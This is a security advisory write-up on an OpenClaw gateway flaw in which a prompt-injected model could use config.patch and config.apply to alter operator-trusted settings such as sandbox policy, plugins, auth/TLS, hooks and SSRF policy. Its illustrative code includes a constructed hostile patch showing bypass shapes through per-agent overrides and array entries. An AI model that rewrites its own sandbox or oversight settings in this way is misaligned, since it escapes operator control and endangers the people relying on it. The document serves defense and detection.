What happened
OpenClaw’s agent‑facing gateway operations config.patch and config.apply did not fully guard operator‑trusted fields before version 2026.4.20, so a model could persist sensitive configuration changes outside its intended scope (GitHub Advisory GHSA-7jm2-g593-4qrc). All openclaw npm releases before 2026.4.20 are affected; the fix shipped in 2026.4.20. The advisory frames the issue as a model‑to‑operator guard bypass, not a remote unauthenticated gateway compromise, and rates it medium severity.
A prompt‑injected model with access to the owner‑only gateway tool could change guarded settings through these config mutation flows, persisting changes that should have required operator control (OpenClaw advisory). The fix extends the block on model‑driven config mutations to a broader set of operator‑trusted paths and correctly handles per‑agent overrides and array‑entry patching. The remediation shipped in commit fe30b31a97a917ecc6e92f6c85378b6b20352422 as part of the 2026.4.20 release (fix commit cited in the advisory).
Why it matters
The guard gap covered operator‑trusted settings that define the security posture of the gateway and its connected agents, so a compromised or coerced model could degrade protections without operator review (GHSA). Exposed settings included:
- Sandbox policy, which constrains agent execution
- Plugin enablement, which gates capability expansion
- Gateway auth/TLS, foundational for channel integrity
- Hook routing, which directs privileged flows
- MCP server configuration, controlling model‑capability plumbing
- SSRF policy, a core egress safety boundary
- Filesystem hardening, limiting persistent impact
If a model can toggle any of these without human approval, it can silently weaken containment and trust boundaries, even though the gateway intends to restrict model‑originated config writes to safer surfaces (GHSA summary). That is the model‑to‑operator guard bypass the advisory describes, not a gateway takeover from the network edge.
Technical detail
OpenClaw exposes agent‑facing config mutation flows (config.patch / config.apply) meant to accept limited, low‑risk changes from model‑driven operations, with a guard layer intended to deny writes to privileged paths (GHSA details). The guard’s coverage was incomplete: several operator‑trusted settings sat outside the protected path set, so an agent‑originated patch could change them and persist those changes. The affected settings were sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening, all of which should require operator action (advisory list).
The threat model is specific: a prompt‑injected model that can use an owner‑only gateway tool could drive these calls and write to privileged configuration fields, circumventing the intended operator approval step (threat model in GHSA). The fix expands the blocked operator‑trusted path set so that model‑driven mutations are denied across those sensitive areas, and adds coverage for per‑agent overrides and array‑entry patching, two shapes of write that previously slipped past the filter. The maintainers shipped the remediation in 2026.4.20, tied to commit fe30b31a97a917ecc6e92f6c85378b6b20352422 (advisory release note).
Defense
- Upgrade immediately to OpenClaw 2026.4.20 to receive the broadened guard coverage for operator‑trusted paths and the per‑agent/array‑entry protections (upgrade guidance).
- Audit gateway configuration for drift in the previously unprotected areas: sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening, especially if agents had any config mutation capability before the patch. Compare the live config against a known‑good baseline rather than trusting what the gateway currently reports.
- Restrict agent access to the owner‑only gateway tool and scrutinize any automation that routes model prompts to the config mutation endpoints (config.patch / config.apply).
- Instrument detection around gateway config changes: alert on mutations to the operator‑trusted path set now called out by the project, and verify that each change was initiated by an operator, not a model workflow. This requires that the config‑change audit trail records the originating actor, not just the changed keys.
- Treat model prompts that self‑request capability or policy changes as high‑risk and require explicit human approval when they intersect with the enumerated sensitive fields.
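The two guard shapes described under Technical detail (a short list matched against raw paths versus a canonicalized check over the full operator‑trusted set) and the detection bullet above share the same path logic, so the following is one added example covering both. It is illustrative code written for this page, not OpenClaw’s own guard or schema: the config key names (sandbox, plugins, gateway.auth, hooks, mcpServers, ssrf, filesystem), the agents.<id>.… override layout, and the audit event shape are all assumptions.

```typescript
// Added illustration for this page; NOT OpenClaw's code. Key names, the
// per-agent override layout and the audit event shape are assumptions.

type Json = null | boolean | number | string | Json[] | { [key: string]: Json };
type Actor = "operator" | "model";

// Assumed dotted-path prefixes for the operator-trusted settings the advisory lists.
const OPERATOR_TRUSTED_PREFIXES: string[] = [
  "sandbox",        // sandbox policy
  "plugins",        // plugin enablement
  "gateway.auth",   // gateway auth
  "gateway.tls",    // gateway TLS
  "hooks",          // hook routing
  "mcpServers",     // MCP server configuration
  "ssrf",           // SSRF policy
  "filesystem",     // filesystem hardening
];

// Flatten a nested patch object into the leaf paths it would write,
// e.g. { hooks: [{ target: "x" }] } -> ["hooks[0].target"].
function leafPaths(patch: Json, prefix = ""): string[] {
  const out: string[] = [];
  if (Array.isArray(patch)) {
    patch.forEach((item, i) => out.push(...leafPaths(item, `${prefix}[${i}]`)));
  } else if (patch !== null && typeof patch === "object") {
    for (const key of Object.keys(patch)) {
      out.push(...leafPaths(patch[key], prefix ? `${prefix}.${key}` : key));
    }
  } else {
    out.push(prefix);
  }
  return out;
}

function hasPrefix(path: string, prefix: string): boolean {
  return path === prefix || path.indexOf(prefix + ".") === 0;
}

// Pre-fix shape: a short list, matched against the raw path. It misses settings
// outside the list, per-agent overrides (agents.<id>.sandbox...) and array
// entries ("hooks[0].target" does not start with "hooks.").
function naiveGuardRejects(patch: Json): string[] {
  const shortList = ["gateway.auth", "gateway.tls", "sandbox", "hooks"];
  return leafPaths(patch).filter(p => shortList.some(s => hasPrefix(p, s)));
}

// Canonicalize before checking: drop array indexes and map a per-agent
// override onto the global key it overrides, so both hit the same rule.
// Assumes agents are keyed by id (agents.<id>...), not stored as an array.
function canonicalPath(path: string): string {
  const noIndex = path.replace(/\[\d+\]/g, "");
  const override = /^agents\.[^.]+\.(.+)$/.exec(noIndex);
  return override ? override[1] : noIndex;
}

function touchesTrustedPath(path: string): boolean {
  return OPERATOR_TRUSTED_PREFIXES.some(s => hasPrefix(canonicalPath(path), s));
}

// Fixed shape: canonicalize, then check the broader operator-trusted set.
function hardenedGuardRejects(patch: Json): string[] {
  return leafPaths(patch).filter(touchesTrustedPath);
}

// Detection side: a constructed config-change audit event with actor attribution.
interface ConfigChangeEvent {
  actor: Actor;
  op: "config.patch" | "config.apply";
  paths: string[];
}

// Flag model-originated writes to the operator-trusted set. Operator-originated
// writes to the same paths are permitted but still worth logging.
function modelWritesToTrustedPaths(events: ConfigChangeEvent[]): ConfigChangeEvent[] {
  return events.filter(e => e.actor === "model" && e.paths.some(touchesTrustedPath));
}

// Constructed sample: a prompt-injected model trying several bypass shapes at once.
const modelPatch: Json = {
  plugins: { enabled: ["shell-exec"] },              // outside the short list
  agents: { coder: { sandbox: { mode: "off" } } },    // per-agent override
  hooks: [{ target: "https://attacker.example/x" }],  // array entry
  ssrf: { allowPrivateRanges: true },                 // outside the short list
  gateway: { tls: { enabled: false } },               // the one the short list catches
};

// Constructed sample audit trail.
const auditEvents: ConfigChangeEvent[] = [
  { actor: "operator", op: "config.apply", paths: ["gateway.tls.certFile"] },
  { actor: "model", op: "config.patch", paths: ["ui.theme"] },
  { actor: "model", op: "config.patch", paths: ["agents.coder.sandbox.mode"] },
  { actor: "model", op: "config.patch", paths: ["mcpServers[1].command"] },
];

console.log("naive guard rejects:", naiveGuardRejects(modelPatch));
console.log("hardened guard rejects:", hardenedGuardRejects(modelPatch));
console.log("model writes to trusted paths:", modelWritesToTrustedPaths(auditEvents));
```

The naive guard rejects only gateway.tls.enabled and lets the other four writes through, which is the gap the advisory describes; the hardened guard rejects all five. For config.apply, which carries a whole config rather than a patch, the same check applies to the set of paths whose values differ between the current and proposed config, so the diff must be computed before the guard runs, not after the write.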
Lyrie Verdict
This is a clean model‑to‑operator guard bypass: the model can drive config.patch / config.apply to flip high‑impact switches unless you stop it at machine speed. Lyrie’s autonomous detectors should enforce an allowlist for agent‑originated gateway config writes, explicitly blocking the operator‑trusted paths enumerated by OpenClaw, and correlate prompt content that seeks capability or policy changes with ensuing config mutation attempts in real time. We recommend continuous telemetry on those paths, source attribution to operator vs. model, and automatic rollback when a model‑sourced mutation touches sandbox, plugin enablement, auth/TLS, hook routing, MCP config, SSRF, or filesystem hardening, before the change propagates. Autonomous containment here is non‑negotiable: block, alert, and require human sign‑off for any agent‑initiated write to the protected set now covered in 2026.4.20.